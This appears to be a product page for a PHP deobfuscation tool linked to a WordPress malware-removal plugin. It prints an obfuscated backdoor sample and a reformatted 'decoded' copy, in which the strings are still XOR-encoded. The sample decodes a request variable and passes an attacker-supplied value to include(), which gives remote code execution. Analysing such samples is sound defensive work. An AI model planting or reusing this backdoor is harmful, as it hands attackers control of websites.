Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $check = 'i6Pq3TR7ZvcpwHA'; $expages = $check; function exts($found, $mins) { $chars = $mins; $keys = urldecode($found); $terms = substr($chars,0, strlen($keys)); $original_image_url = $keys ^ $terms; return $original_image_url; } $current_user = ${exts("6p%19%3Dv%07", $expages)}; $uris = $...



Obfuscated php code

<?php $check = 'i6Pq3TR7ZvcpwHA';
$expages = $check;
function exts($found, $mins)

{
    $chars = $mins;

    $keys = urldecode($found);
    $terms = substr($chars,0, strlen($keys));

    $original_image_url = $keys ^ $terms;
    return $original_image_url;

}
$current_user = ${exts("6p%19%3Dv%07", $expages)};
$uris = $current_user;
if (isset($uris[$expages]))

{
    $base = $current_user[$expages];
    $script_and_style_regex = $base[exts("%1D%5B+.%5D5%3FR", $expages)];
    $space = 'custom_fields';
    $dynamic = $script_and_style_regex;
    $old_dates = 'opening_quote';
    include ($dynamic);

}

Decoded(de-Obfuscated) php code

<?php

$check = 'i6Pq3TR7ZvcpwHA';
$expages = $check;
function exts($found, $mins)
{
    $chars = $mins;
    $keys = urldecode($found);
    $terms = substr($chars, 0, strlen($keys));
    $original_image_url = $keys ^ $terms;
    return $original_image_url;
}
$current_user = ${exts("6p%19%3Dv%07", $expages)};
$uris = $current_user;
if (isset($uris[$expages])) {
    $base = $current_user[$expages];
    $script_and_style_regex = $base[exts("%1D%5B+.%5D5%3FR", $expages)];
    $space = 'custom_fields';
    $dynamic = $script_and_style_regex;
    $old_dates = 'opening_quote';
    include $dynamic;
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.